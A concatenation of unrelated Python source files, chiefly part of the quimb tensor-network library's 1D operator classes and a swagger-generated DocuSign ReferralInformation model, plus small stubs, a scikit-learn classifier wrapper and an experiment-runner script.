"""Permute the indices of each tensor in this MPO to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrud'`` specifying the desired order of the
left, right, upper and lower (down) indices respectively.
"""
for i in self.sites:
inds = {'u': self.upper_ind(i), 'd': self.lower_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def trace(self, left_inds=None, right_inds=None):
"""Take the trace of this MPO.
"""
if left_inds is None:
left_inds = map(self.upper_ind, self.gen_site_coos())
if right_inds is None:
right_inds = map(self.lower_ind, self.gen_site_coos())
return super().trace(left_inds, right_inds)
def partial_transpose(self, sysa, inplace=False):
"""Perform the partial transpose on this MPO by swapping the bra and
ket indices on sites in ``sysa``.
Parameters
----------
sysa : sequence of int or int
The sites to transpose indices on.
inplace : bool, optional
Whether to perform the partial transposition inplace.
Returns
-------
MatrixProductOperator
"""
tn = self if inplace else self.copy()
if isinstance(sysa, Integral):
sysa = (sysa,)
tmp_ind_id = "__tmp_{}__"
tn.reindex_({tn.upper_ind(i): tmp_ind_id.format(i) for i in sysa})
tn.reindex_({tn.lower_ind(i): tn.upper_ind(i) for i in sysa})
tn.reindex_({tmp_ind_id.format(i): tn.lower_ind(i) for i in sysa})
return tn
def __add__(self, other):
"""MPO addition.
"""
return self.add_MPO(other, inplace=False)
def __iadd__(self, other):
"""In-place MPO addition.
"""
return self.add_MPO(other, inplace=True)
def __sub__(self, other):
"""MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=False)
def __isub__(self, other):
"""In-place MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=True)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
return tuple(map(self.lower_ind, self.gen_site_coos()))
def rand_state(self, bond_dim, **mps_opts):
"""Get a random vector matching this MPO.
"""
return qu.tensor.MPS_rand_state(
self.L, bond_dim=bond_dim,
phys_dim=[self.phys_dim(i) for i in self.sites],
dtype=self.dtype, cyclic=self.cyclic, **mps_opts
)
def identity(self, **mpo_opts):
"""Get a identity matching this MPO.
"""
return qu.tensor.MPO_identity_like(self, **mpo_opts)
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f"│{bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
l1 += "│"
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
class Dense1D(TensorNetwork1DVector,
TensorNetwork1D,
TensorNetwork):
"""Mimics other 1D tensor network structures, but really just keeps the
full state in a single tensor. This allows e.g. applying gates in the same
way for quantum circuit simulation as lazily represented hilbert spaces.
Parameters
----------
array : array_like
The full hilbert space vector - assumed to be made of equal hilbert
spaces each of size ``phys_dim`` and will be reshaped as such.
phys_dim : int, optional
The hilbert space size of each site, default: 2.
tags : sequence of str, optional
Extra tags to add to the tensor network.
site_ind_id : str, optional
String formatter describing how to label the site indices.
site_tag_id : str, optional
String formatter describing how to label the site tags.
tn_opts
Supplied to :class:`~quimb.tensor.tensor_core.TensorNetwork`.
"""
_EXTRA_PROPS = (
'_site_ind_id',
'_site_tag_id',
'_L',
)
def __init__(self, array, phys_dim=2, tags=None,
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# copy short-circuit
if isinstance(array, Dense1D):
super().__init__(array)
return
# work out number of sites and sub-dimensions etc.
self._L = qu.infer_size(array, base=phys_dim)
dims = [phys_dim] * self.L
data = ops.asarray(array).reshape(*dims)
# process site indices
self._site_ind_id = site_ind_id
site_inds = [self.site_ind(i) for i in range(self.L)]
# process site tags
self._site_tag_id = site_tag_id
site_tags = oset(self.site_tag(i) for i in range(self.L))
if tags is not None:
# mix in global tags
site_tags = tags_to_oset(tags) | site_tags
T = Tensor(data=data, inds=site_inds, tags=site_tags)
super().__init__([T], virtual=True, **tn_opts)
@classmethod
def rand(cls, n, phys_dim=2, dtype=float, **dense1d_opts):
"""Create a random dense vector 'tensor network'.
"""
array = qu.randn(phys_dim ** n, dtype=dtype)
array /= qu.norm(array, 'fro')
return cls(array, **dense1d_opts)
class SuperOperator1D(
TensorNetwork1D,
TensorNetwork,
):
r"""A 1D tensor network super-operator class::
0 1 2 n-1
| | | | <-- outer_upper_ind_id
O===O===O== =O
|\ |\ |\ |\ <-- inner_upper_ind_id
) ) ) ... ) <-- K (size of local Kraus sum)
|/ |/ |/ |/ <-- inner_lower_ind_id
O===O===O== =O
| | : | | <-- outer_lower_ind_id
:
chi (size of entangling bond dim)
Parameters
----------
arrays : sequence of arrays
The data arrays defining the superoperator, this should be a sequence
of 2n arrays, such that the first two correspond to the upper and lower
operators acting on site 0 etc. The arrays should be 5 dimensional
unless OBC conditions are desired, in which case the first two and last
two should be 4-dimensional. The dimensions of array can be should
match the ``shape`` option.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_outer_upper_ind_id',
'_inner_upper_ind_id',
'_inner_lower_ind_id',
'_outer_lower_ind_id',
'cyclic',
'_L',
)
def __init__(
self, arrays,
shape='lrkud',
site_tag_id='I{}',
outer_upper_ind_id='kn{}',
inner_upper_ind_id='k{}',
inner_lower_ind_id='b{}',
outer_lower_ind_id='bn{}',
tags=None,
tags_upper=None,
tags_lower=None,
**tn_opts,
):
# short-circuit for copying
if isinstance(arrays, SuperOperator1D):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays) // 2
# process indices
self._outer_upper_ind_id = outer_upper_ind_id
self._inner_upper_ind_id = inner_upper_ind_id
self._inner_lower_ind_id = inner_lower_ind_id
self._outer_lower_ind_id = outer_lower_ind_id
outer_upper_inds = map(outer_upper_ind_id.format, self.gen_site_coos())
inner_upper_inds = map(inner_upper_ind_id.format, self.gen_site_coos())
inner_lower_inds = map(inner_lower_ind_id.format, self.gen_site_coos())
outer_lower_inds = map(outer_lower_ind_id.format, self.gen_site_coos())
# process tags
self._site_tag_id = site_tag_id
tags = tags_to_oset(tags)
tags_upper = tags_to_oset(tags_upper)
tags_lower = tags_to_oset(tags_lower)
def gen_tags():
for site_tag in self.site_tags:
yield (site_tag,) + tags + tags_upper
yield (site_tag,) + tags + tags_lower
self.cyclic = (ops.ndim(arrays[0]) == 5)
# transpose arrays to 'lrkud' order
# u
# |
# l--O--r
# |\
# d k
def gen_orders():
lkud_ord = tuple(shape.replace('r', "").find(x) for x in 'lkud')
rkud_ord = tuple(shape.replace('l', "").find(x) for x in 'rkud')
lrkud_ord = tuple(map(shape.find, 'lrkud'))
yield rkud_ord if not self.cyclic else lrkud_ord
yield rkud_ord if not self.cyclic else lrkud_ord
for _ in range(self.L - 2):
yield lrkud_ord
yield lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
def gen_inds():
# |<- outer_upper_ind
# cycU_ix or pU_ix --O-- nU_ix
# /|<- inner_upper_ind
# k_ix ->(
# \|<- inner_lower_ind
# cycL_ix or pL_ix --O-- nL_ix
# |<- outer_lower_ind
if self.cyclic:
cycU_ix, cycL_ix = (rand_uuid(),), (rand_uuid(),)
else:
cycU_ix, cycL_ix = (), ()
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (*cycU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (*cycL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
for _ in range(self.L - 2):
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (pU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
k_ix = rand_uuid()
yield (pU_ix, *cycU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, *cycL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
def gen_tensors():
for array, tags, inds, order in zip(arrays, gen_tags(),
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=tags)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def rand(cls, n, K, chi, phys_dim=2, herm=True,
cyclic=False, dtype=complex, **superop_opts):
def gen_arrays():
for i in range(n):
shape = []
if cyclic or (i != 0):
shape += [chi]
if cyclic or (i != n - 1):
shape += [chi]
shape += [K, phys_dim, phys_dim]
data = qu.randn(shape=shape, dtype=dtype)
yield data
if herm:
yield data.conj()
else:
yield qu.randn(shape=shape, dtype=dtype)
arrays = map(ops.sensibly_scale, gen_arrays())
return cls(arrays, **superop_opts)
@property
def outer_upper_ind_id(self):
return self._outer_upper_ind_id
@property
def inner_upper_ind_id(self):
return self._inner_upper_ind_id
@property
def inner_lower_ind_id(self):
return self._inner_lower_ind_id
@property
def outer_lower_ind_id(self):
return self._outer_lower_ind_id
class TNLinearOperator1D(spla.LinearOperator):
r"""A 1D tensor network linear operator like::
start stop - 1
. .
:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
: | | | | | | | | | | | | : |
:-H-H-H-H-H-H-H-H-H-H-H-H-: acting on --V
: | | | | | | | | | | | | : |
:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
left_inds^ ^right_inds
Like :class:`~quimb.tensor.tensor_core.TNLinearOperator`, but performs a
structured contract from one end to the other than can handle very long
chains possibly more efficiently by contracting in blocks from one end.
Parameters
----------
tn : TensorNetwork
The tensor network to turn into a ``LinearOperator``.
left_inds : sequence of str
The left indicies.
right_inds : sequence of str
The right indicies.
start : int
Index of starting site.
stop : int
Index of stopping site (does not include this site).
ldims : tuple of int, optional
If known, the dimensions corresponding to ``left_inds``.
rdims : tuple of int, optional
If known, the dimensions corresponding to ``right_inds``.
See Also
--------
TNLinearOperator
"""
def __init__(self, tn, left_inds, right_inds, start, stop,
ldims=None, rdims=None, is_conj=False, is_trans=False):
self.tn = tn
self.start, self.stop = start, stop
if ldims is None or rdims is None:
ind_sizes = tn.ind_sizes()
ldims = tuple(ind_sizes[i] for i in left_inds)
rdims = tuple(ind_sizes[i] for i in right_inds)
self.left_inds, self.right_inds = left_inds, right_inds
self.ldims, ld = ldims, qu.prod(ldims)
self.rdims, rd = rdims, qu.prod(rdims)
self.tags = self.tn.tags
# conjugate inputs/ouputs rather all tensors if necessary
self.is_conj = is_conj
self.is_trans = is_trans
self._conj_linop = None
self._adjoint_linop = None
self._transpose_linop = None
super().__init__(dtype=self.tn.dtype, shape=(ld, rd))
def _matvec(self, vec):
in_data = reshape(vec, self.rdims)
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the vector to the right of the chain
tnc = self.tn | Tensor(in_data, self.right_inds, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, self.right_inds, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_data = out_T.transpose_(*self.left_inds).data.ravel()
if self.is_conj:
out_data = conj(out_data)
return out_data
def _matmat(self, mat):
d = mat.shape[-1]
in_data = reshape(mat, (*self.rdims, d))
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the vector to the right of the chain
in_ix = (*self.right_inds, '_mat_ix')
tnc = self.tn | Tensor(in_data, inds=in_ix, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, inds=in_ix, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_ix = (*self.left_inds, '_mat_ix')
out_data = reshape(out_T.transpose_(*out_ix).data, (-1, d))
if self.is_conj:
out_data = conj(out_data)
return out_data
def copy(self, conj=False, transpose=False):
if transpose:
inds = (self.right_inds, self.left_inds)
dims = (self.rdims, self.ldims)
is_trans = not self.is_trans
else:
inds = (self.left_inds, self.right_inds)
dims = (self.ldims, self.rdims)
is_trans = self.is_trans
if conj:
is_conj = not self.is_conj
else:
is_conj = self.is_conj
return TNLinearOperator1D(self.tn, *inds, self.start, self.stop, *dims,
is_conj=is_conj, is_trans=is_trans)
def conj(self):
if self._conj_linop is None:
self._conj_linop = self.copy(conj=True)
return self._conj_linop
def _transpose(self):
if self._transpose_linop is None:
self._transpose_linop = self.copy(transpose=True)
return self._transpose_linop
def _adjoint(self):
"""Hermitian conjugate of this TNLO.
"""
# cache the adjoint
if self._adjoint_linop is None:
self._adjoint_linop = self.copy(conj=True, transpose=True)
return self._adjoint_linop
def to_dense(self):
T = self.tn ^ slice(self.start, self.stop)
if self.is_conj:
T = T.conj()
return T.to_dense(self.left_inds, self.right_inds)
@property
def A(self):
return self.to_dense()
|
py | 1a331dcb2d7975964f9c948bee1535fb4cef60f0 | # terrascript/provider/archive.py
import terrascript
class archive(terrascript.Provider):
pass
__all__ = ["archive"]
|
py | 1a331dcd884f21484a1ac3d94ba07556bc93d021 | # coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from docusign_esign.client.configuration import Configuration
class ReferralInformation(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'advertisement_id': 'str',
'enable_support': 'str',
'external_org_id': 'str',
'group_member_id': 'str',
'id_type': 'str',
'included_seats': 'str',
'industry': 'str',
'plan_start_month': 'str',
'promo_code': 'str',
'publisher_id': 'str',
'referral_code': 'str',
'referrer_name': 'str',
'sale_discount_amount': 'str',
'sale_discount_fixed_amount': 'str',
'sale_discount_percent': 'str',
'sale_discount_periods': 'str',
'sale_discount_seat_price_override': 'str',
'shopper_id': 'str'
}
attribute_map = {
'advertisement_id': 'advertisementId',
'enable_support': 'enableSupport',
'external_org_id': 'externalOrgId',
'group_member_id': 'groupMemberId',
'id_type': 'idType',
'included_seats': 'includedSeats',
'industry': 'industry',
'plan_start_month': 'planStartMonth',
'promo_code': 'promoCode',
'publisher_id': 'publisherId',
'referral_code': 'referralCode',
'referrer_name': 'referrerName',
'sale_discount_amount': 'saleDiscountAmount',
'sale_discount_fixed_amount': 'saleDiscountFixedAmount',
'sale_discount_percent': 'saleDiscountPercent',
'sale_discount_periods': 'saleDiscountPeriods',
'sale_discount_seat_price_override': 'saleDiscountSeatPriceOverride',
'shopper_id': 'shopperId'
}
def __init__(self, _configuration=None, **kwargs): # noqa: E501
"""ReferralInformation - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._advertisement_id = None
self._enable_support = None
self._external_org_id = None
self._group_member_id = None
self._id_type = None
self._included_seats = None
self._industry = None
self._plan_start_month = None
self._promo_code = None
self._publisher_id = None
self._referral_code = None
self._referrer_name = None
self._sale_discount_amount = None
self._sale_discount_fixed_amount = None
self._sale_discount_percent = None
self._sale_discount_periods = None
self._sale_discount_seat_price_override = None
self._shopper_id = None
self.discriminator = None
setattr(self, "_{}".format('advertisement_id'), kwargs.get('advertisement_id', None))
setattr(self, "_{}".format('enable_support'), kwargs.get('enable_support', None))
setattr(self, "_{}".format('external_org_id'), kwargs.get('external_org_id', None))
setattr(self, "_{}".format('group_member_id'), kwargs.get('group_member_id', None))
setattr(self, "_{}".format('id_type'), kwargs.get('id_type', None))
setattr(self, "_{}".format('included_seats'), kwargs.get('included_seats', None))
setattr(self, "_{}".format('industry'), kwargs.get('industry', None))
setattr(self, "_{}".format('plan_start_month'), kwargs.get('plan_start_month', None))
setattr(self, "_{}".format('promo_code'), kwargs.get('promo_code', None))
setattr(self, "_{}".format('publisher_id'), kwargs.get('publisher_id', None))
setattr(self, "_{}".format('referral_code'), kwargs.get('referral_code', None))
setattr(self, "_{}".format('referrer_name'), kwargs.get('referrer_name', None))
setattr(self, "_{}".format('sale_discount_amount'), kwargs.get('sale_discount_amount', None))
setattr(self, "_{}".format('sale_discount_fixed_amount'), kwargs.get('sale_discount_fixed_amount', None))
setattr(self, "_{}".format('sale_discount_percent'), kwargs.get('sale_discount_percent', None))
setattr(self, "_{}".format('sale_discount_periods'), kwargs.get('sale_discount_periods', None))
setattr(self, "_{}".format('sale_discount_seat_price_override'), kwargs.get('sale_discount_seat_price_override', None))
setattr(self, "_{}".format('shopper_id'), kwargs.get('shopper_id', None))
@property
def advertisement_id(self):
"""Gets the advertisement_id of this ReferralInformation. # noqa: E501
A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DoucSign use only. # noqa: E501
:return: The advertisement_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._advertisement_id
@advertisement_id.setter
def advertisement_id(self, advertisement_id):
"""Sets the advertisement_id of this ReferralInformation.
A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DoucSign use only. # noqa: E501
:param advertisement_id: The advertisement_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._advertisement_id = advertisement_id
@property
def enable_support(self):
"""Gets the enable_support of this ReferralInformation. # noqa: E501
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:return: The enable_support of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._enable_support
@enable_support.setter
def enable_support(self, enable_support):
"""Sets the enable_support of this ReferralInformation.
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:param enable_support: The enable_support of this ReferralInformation. # noqa: E501
:type: str
"""
self._enable_support = enable_support
@property
def external_org_id(self):
"""Gets the external_org_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The external_org_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._external_org_id
@external_org_id.setter
def external_org_id(self, external_org_id):
"""Sets the external_org_id of this ReferralInformation.
# noqa: E501
:param external_org_id: The external_org_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._external_org_id = external_org_id
@property
def group_member_id(self):
"""Gets the group_member_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The group_member_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._group_member_id
@group_member_id.setter
def group_member_id(self, group_member_id):
"""Sets the group_member_id of this ReferralInformation.
# noqa: E501
:param group_member_id: The group_member_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._group_member_id = group_member_id
@property
def id_type(self):
"""Gets the id_type of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The id_type of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._id_type
@id_type.setter
def id_type(self, id_type):
"""Sets the id_type of this ReferralInformation.
# noqa: E501
:param id_type: The id_type of this ReferralInformation. # noqa: E501
:type: str
"""
self._id_type = id_type
@property
def included_seats(self):
"""Gets the included_seats of this ReferralInformation. # noqa: E501
The number of seats (users) included. # noqa: E501
:return: The included_seats of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._included_seats
@included_seats.setter
def included_seats(self, included_seats):
"""Sets the included_seats of this ReferralInformation.
The number of seats (users) included. # noqa: E501
:param included_seats: The included_seats of this ReferralInformation. # noqa: E501
:type: str
"""
self._included_seats = included_seats
@property
def industry(self):
"""Gets the industry of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The industry of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._industry
@industry.setter
def industry(self, industry):
"""Sets the industry of this ReferralInformation.
# noqa: E501
:param industry: The industry of this ReferralInformation. # noqa: E501
:type: str
"""
self._industry = industry
@property
def plan_start_month(self):
"""Gets the plan_start_month of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The plan_start_month of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._plan_start_month
@plan_start_month.setter
def plan_start_month(self, plan_start_month):
"""Sets the plan_start_month of this ReferralInformation.
# noqa: E501
:param plan_start_month: The plan_start_month of this ReferralInformation. # noqa: E501
:type: str
"""
self._plan_start_month = plan_start_month
@property
def promo_code(self):
"""Gets the promo_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The promo_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._promo_code
@promo_code.setter
def promo_code(self, promo_code):
"""Sets the promo_code of this ReferralInformation.
# noqa: E501
:param promo_code: The promo_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._promo_code = promo_code
@property
def publisher_id(self):
"""Gets the publisher_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The publisher_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._publisher_id
@publisher_id.setter
def publisher_id(self, publisher_id):
"""Sets the publisher_id of this ReferralInformation.
# noqa: E501
:param publisher_id: The publisher_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._publisher_id = publisher_id
@property
def referral_code(self):
"""Gets the referral_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referral_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referral_code
@referral_code.setter
def referral_code(self, referral_code):
"""Sets the referral_code of this ReferralInformation.
# noqa: E501
:param referral_code: The referral_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._referral_code = referral_code
@property
def referrer_name(self):
"""Gets the referrer_name of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referrer_name of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referrer_name
@referrer_name.setter
def referrer_name(self, referrer_name):
"""Sets the referrer_name of this ReferralInformation.
# noqa: E501
:param referrer_name: The referrer_name of this ReferralInformation. # noqa: E501
:type: str
"""
self._referrer_name = referrer_name
@property
def sale_discount_amount(self):
"""Gets the sale_discount_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_amount
@sale_discount_amount.setter
def sale_discount_amount(self, sale_discount_amount):
"""Sets the sale_discount_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_amount: The sale_discount_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_amount = sale_discount_amount
@property
def sale_discount_fixed_amount(self):
"""Gets the sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_fixed_amount
@sale_discount_fixed_amount.setter
def sale_discount_fixed_amount(self, sale_discount_fixed_amount):
"""Sets the sale_discount_fixed_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_fixed_amount: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_fixed_amount = sale_discount_fixed_amount
@property
def sale_discount_percent(self):
"""Gets the sale_discount_percent of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_percent of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_percent
@sale_discount_percent.setter
def sale_discount_percent(self, sale_discount_percent):
"""Sets the sale_discount_percent of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_percent: The sale_discount_percent of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_percent = sale_discount_percent
@property
def sale_discount_periods(self):
"""Gets the sale_discount_periods of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_periods of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_periods
@sale_discount_periods.setter
def sale_discount_periods(self, sale_discount_periods):
"""Sets the sale_discount_periods of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_periods: The sale_discount_periods of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_periods = sale_discount_periods
@property
def sale_discount_seat_price_override(self):
"""Gets the sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_seat_price_override
@sale_discount_seat_price_override.setter
def sale_discount_seat_price_override(self, sale_discount_seat_price_override):
"""Sets the sale_discount_seat_price_override of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_seat_price_override: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_seat_price_override = sale_discount_seat_price_override
@property
def shopper_id(self):
"""Gets the shopper_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The shopper_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._shopper_id
@shopper_id.setter
def shopper_id(self, shopper_id):
"""Sets the shopper_id of this ReferralInformation.
# noqa: E501
:param shopper_id: The shopper_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._shopper_id = shopper_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReferralInformation, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReferralInformation):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ReferralInformation):
return True
return self.to_dict() != other.to_dict()
|
py | 1a331e7cc3d6a21242e52000ec28aa93151714e5 | #!/usr/bin/env python3
from . import potcar
from . import poscar
from . import incar
from . import kpoints
from . import doscar
from . import outcar
from . import wavecar
from . import chgcar
from . import chg
__all_modules__ = [
potcar,
poscar,
incar,
kpoints,
doscar,
outcar,
wavecar,
chgcar,
chg,
]
|
py | 1a331fd5c19d7cb3e51c10e29de67b09de27fab5 | #!/usr/bin/env python
from sklearn import svm
import numpy as np
from sklearn.externals import joblib
from sklearn import linear_model
import classifier.msg as msg
import os
SINGLE = 0
MULTIPLE = 1
def ini(path=None):
'''initialization
Args:
Returns:
'''
global clf
clf = linear_model.LogisticRegression(class_weight='balanced') #LR
if path is not None:
if os.path.exists(path):
clf = joblib.load(path)
msg.timemsg('Loaded classifier from: {}'.format(path))
else:
msg.timemsg('Path to classifier does not exist: {}'.format(path))
# SVM
#clf = svm.SVC(kernel='linear', C = 1.0) # SVM
def train(features, labels, path='clf.pkl'):
'''train classifier
Args:
features (list): Features
labels (list): Labels
Returns:
'''
global clf
msg.timemsg("train_shape: {}".format(features.shape))
msg.timemsg('Start training')
clf.fit(features, labels)
msg.timemsg('Finished training')
try:
joblib.dump(clf, path)
msg.timemsg('Dumped classifier')
except:
msg.timemsg('Failed to dump classifier!')
def predict(X, mode):
'''Prediction
Args:
Returns:
prediction (list)
'''
global clf
if (mode == MULTIPLE): # many features
#msg.timemsg("predict_shape: {}".format(X.shape))
return clf.predict(X)
if (mode == SINGLE):
return np.squeeze(np.array(clf.predict(X.reshape(1,-1)))) # convert to array, one dimension too much, remove it
def save (folder):
'''Save
Args:
folder
Returns:
.pkl
'''
global clf
joblib.dump(clf, folder)
def load (folder):
'''Save
Args:
folder
Returns:
.pkl
'''
global clf
clf = joblib.load(folder)
|
py | 1a332025cf6adb173a13a84fa1874610be7d7d81 | #!/usr/bin/env python
import subprocess
with open("output.txt", "w+") as output:
i = 1
while i < 51:
fName = '{:0>3}.txt'.format(i)
subprocess.call(["python", "./reuters_experiment.py", fName], stdout=output);
i += 1 |
py | 1a3320315424c0a1da18cdc9e918996892943d31 | from rover.RoverHelpers import compute_energy_drain
